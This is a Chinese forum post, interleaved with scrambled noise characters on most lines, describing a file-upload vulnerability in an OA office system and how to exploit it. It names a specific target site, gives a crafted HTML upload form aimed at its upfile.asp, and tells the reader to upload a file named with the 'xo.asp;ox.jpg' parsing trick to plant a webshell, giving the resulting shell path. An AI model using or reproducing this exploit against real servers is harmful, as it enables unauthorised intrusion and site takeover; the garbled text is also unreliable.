全能OA办公系统 上传漏洞
- g8 n, J1 U( n; f J1 _, c' ^8 Z0 l4 H) V' F$ S6 R: g
系统介绍:/ `' L. _5 q/ I9 @: }
% Q6 ]& o/ n8 @8 e3 T2 i4 C+ c( x全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。0 ?7 }3 S/ c. V" }$ r! l. e) |
7 L& k' N% W) N7 V主要功能:$ c, x- p+ d3 h
公司通告
L; s0 p! \7 @工作计划 ) c# E9 R) M9 J, A- |/ p* R6 ^
通讯助理
- x- x- ?+ n7 M8 b- O客户资源
4 R; ]( w- j( Q* G7 v% n我的公文
$ v6 M( D9 Z7 X' @5 j' E# ^7 m公文传阅 & X7 J1 A4 A: g$ M( o0 P
公共资源
. h$ ?1 t, k. A7 _& o资源预约 + g. r, O' A" y( F" h6 \% P. v2 K
今日考勤 ! D& L# ]" b0 j
个人计划
1 z" D* L1 J4 W2 T! f1 S1 w- V个人通讯录
6 Q1 H: }* I1 `! X' i# H* I3 f个人基本档案
- ]3 O( f3 a8 k: P未读邮件
3 ]+ ?3 Q6 T0 d% f( j* ]发邮件
{) }& m& G, [收件夹 . z, j$ Z3 h9 Z @% U) B2 p. A
寄件夹 7 I( z; y# e4 x3 |
网络硬盘 ! {+ S: c" E Y( ]
网络会议 8 Z+ W* N% n% }* Q0 x' t+ }/ T& J
网络调查
4 p: R/ p" e5 U" _交流论坛; J5 B! s' |- T% Y1 t
, P: ]! O/ N% T: p有兴趣测试的朋友可以下源码看看# l1 z9 e. X3 r6 F+ m0 n# Q
- a7 R: A- j) |1 T8 `" h! R) j4 l
源码下载:5 x- W6 _3 l+ T8 M) C# w9 @& |
) I% l2 K- u; k9 Y5 S
http://www.mycodes.net/30/4750.htm
1 H# q4 B5 t; v `' C. F) w9 T1 I U, N$ {# Y
漏洞介绍:
/ E6 g" a0 c b# M0 J( I8 {# T) |6 u$ L: d2 H2 {
由upfile.asp上传文件漏洞引起
1 d* ]+ g: H( l$ z% M+ B' E/ T v {- u3 o" L! p
测试方法:
* s/ S$ q/ A$ c4 C& u
6 Z) w( z9 L/ r使用名小子上传http://www.itlynn.com/upfile.asp即可
2 l; X( D/ A' G3 Q7 w9 Q! U" q5 T! E J# W/ a
如果upfile.asp文件被删除不存在。; M2 `5 V; Y% u9 s+ C' Y
) x9 l) I0 D$ E1 a) i( D! n 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。8 E4 O) t" ]1 Q6 n' k+ w
e9 R) i" |8 o$ F) B" e如果存在那么将如下代码保存为upfile.html。
/ D& R9 j$ ^* x6 x% h# P6 n* a; ~8 g: D* h3 ~: F1 a
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。8 h# {) f, J2 o! c
' S. p- H5 \7 R 5 l: }- Q5 a- x, N7 l( O* v
( }5 d4 U0 A5 F; B01 <table border='0' align="center" cellpadding="5">
5 [1 Z8 D3 Z1 s1 g; I# F: V3 q
! G! {$ S8 i9 y) \4 x2 e7 d* W02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
' Y; Q0 l6 w: f, R% [
* v0 c% |) t8 n) D; y03 <tr>
; c+ J5 ^% p$ l1 t% n/ J9 L' r$ f
' F+ I3 N+ ]; r04 <td>报错:</td> $ z1 J' q8 t/ o
# x; c; F0 N: [05 <td><input type='radio' name='errnumber' value='0'> ; K. _5 N' O# c3 M
8 @; W8 b! o3 d06 自动更名
" W( z7 \$ C+ h3 v* S' E( A) o x9 A+ I |( p- z/ O- Y1 Y
07 <input type='radio' name='errnumber' value='1' checked>
2 [' b5 i+ b" L+ N! [) @: G4 O7 Q& t Z7 ^1 L
08 报错方式 8 s1 Y- H8 \5 j( T2 G! ]# @, I5 ^
+ w+ ]: v! J: Z: p09 <input type='radio' name='errnumber' value='2'>
7 y8 P6 u8 W: b9 M: \
" p; {; h+ f* L/ u- z# ~. ~& J10 直接覆盖</td>
& }9 {6 N! F$ A9 J% s& i* A$ @
( B# Z" i5 H% q8 N8 Y- V11 </tr> + I0 W& S, Y1 q$ Y8 u) L& g1 f3 }
7 k- ^: {" u! q; w2 k4 g2 I! r
12 <tr> - ^; K6 \. a: I( Z5 `$ |
1 B, k' c3 j8 ?" c1 \13 <td>主题:</td> G7 X' `4 k$ y7 v" R% W$ ]
( @8 J1 t9 [! n; S5 i- U
14 <td><input type='text' name='filename' size='30'></td> 9 }4 _7 W: ?/ E
: J* o- W3 f) R' ?
15 </tr>
$ H/ s: g! T6 J1 J) V' B- r6 x: k1 i5 y# }6 _0 K8 ~2 k9 G
16 <tr>
P, Q/ O. j8 m; ?/ Y- C$ P) M6 ]. T0 J4 R u2 @
17 <td>文件:</td>
( [! B9 m6 |, Z. ]) g! @& F" n. U2 M. G1 f3 R6 A e
18 <td><input type="file"name="fruit"size="30"></td> * g [ Y& s$ f+ }9 [+ f! w
. \# W, F0 ~! V; @1 K! X19 </tr>
* q% ?. ]" [9 O
1 B- M8 c8 p9 Y' g' W1 _3 G7 F- w3 ^20 <tr> % `& m# L0 M8 q& o1 `( S
8 l7 x3 J- Y5 Q; u21 <td valign='top'>简介:</td> " [6 V- ?: j/ `5 n9 j! @" i
5 F& Y/ F; ]/ M# m8 Z# V) \
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> & w% h# N0 t9 m# P3 m
* f; v9 Q4 i0 i8 w23 </tr> ! r: M G8 R! t7 Q O8 {
9 c( {" m+ H) @5 a+ r- O
24
$ I5 M7 v+ F4 }6 @8 y6 Y9 h, N5 p
: T4 z/ f3 x. T1 L8 R; ?: y25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> % d- N: E/ L) r: |3 E( E
J- b4 Q0 O, |2 t' U
26 </tr>
+ V8 E g1 ]9 r+ ^+ n6 Y7 o9 K
2 M/ @8 ~7 [( C* m% z4 W27 </form> 3 G# t9 V' B4 ]+ p6 {# C$ x
, v! ~: u$ ~# W3 u然后打开上传一个文件名为xo.asp;ox.jpg的文件。$ Z" }! Y: E9 W6 \' Q: A6 f
+ o$ o; R9 I8 w! c1 W$ l" f- I " S! z& `. q! q1 O1 y
9 Y1 c7 E$ k& ~6 P
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
+ J2 `) i2 L& o: B t+ |" a+ g) ~) U0 l8 |! V$ h
此漏洞需要配合解析漏洞利用。
) {: y+ Z: y6 S- l6 D+ a
) C; r+ m+ h5 V& f* e5 r% O |